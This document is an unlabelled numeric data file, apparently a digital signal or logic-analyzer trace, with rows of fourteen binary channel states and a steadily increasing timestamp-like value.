0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425576e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425600e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425700e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425724e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425748e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425776e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2425952e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2425976e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426100e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426124e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426152e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426176e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426200e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426228e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426252e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426276e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426352e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426404e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426428e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426548e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2426556e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2426604e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2426628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426636e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426652e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426676e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426700e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426724e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426748e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426776e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426800e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426828e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426900e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2426908e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2426924e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2426948e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2426956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2426976e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427000e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427100e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427124e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427152e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427176e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427300e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427324e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427376e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427500e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2427508e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2427552e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2427576e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427584e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427628e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427752e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427776e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2427948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2427976e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428000e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428052e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428076e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2428084e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2428100e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2428124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428148e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428176e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2428180e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2428228e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2428252e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428260e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428404e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428428e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428452e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428476e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428552e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428628e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428772e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428796e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428824e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428848e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2428972e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2428996e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429024e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429048e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429172e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429196e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429224e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429248e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429372e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429396e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429424e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429448e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429580e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429704e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429728e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429904e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429928e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2429948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2429980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430004e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430104e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430128e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430180e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430204e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430304e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430328e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430380e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430504e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430528e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430580e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430704e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430728e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430904e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430928e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2430956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2430980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431004e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431104e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431128e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431180e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431204e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431304e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431328e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431356e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431380e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431504e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431528e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431580e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431704e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431728e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431904e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431928e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2431956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2431980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2432004e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2432028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2432052e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2556336e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2556540e-02 1,1,0,1,1,0,0,0,0,0,0,1,0,1,2.2556568e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2556596e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2556884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2556908e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,2.2556916e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,1,2.2556956e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,2.2556980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2556988e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2557004e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2557032e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2557056e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2557084e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.2557108e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2557132e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,2.2557136e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557168e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557180e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557204e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,2.2557212e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557216e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557232e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557256e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557260e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557308e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557340e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557356e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557380e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557404e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557432e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557456e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557484e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557508e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557532e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557536e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557580e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557604e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557612e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557656e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557660e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557708e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557740e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2557780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557804e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557812e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557832e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557856e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557880e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557908e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2557932e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2557956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2557964e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558008e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558032e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558056e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558084e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558156e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558164e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2558180e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558204e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2558232e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558256e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2558284e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558308e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,2.2558312e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558316e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558356e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558380e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558388e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2558432e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558456e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558464e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558484e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558656e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558684e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2558732e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558756e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558764e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558832e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558856e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558884e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2558908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558932e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558936e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2558956e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2558980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2558988e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559032e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559056e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559060e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559084e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559108e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559132e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559156e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559180e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559204e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559212e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559260e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559284e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559308e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559332e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559336e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559380e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559404e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559412e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559456e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559484e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559508e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559532e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559556e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559580e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559604e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559636e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559832e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559836e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2559856e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559888e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2559956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2559980e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2559988e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2560032e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560056e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560064e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560156e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,2.2560160e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560164e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2560180e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560204e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560212e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560256e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560284e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2560308e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560332e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2560356e-02 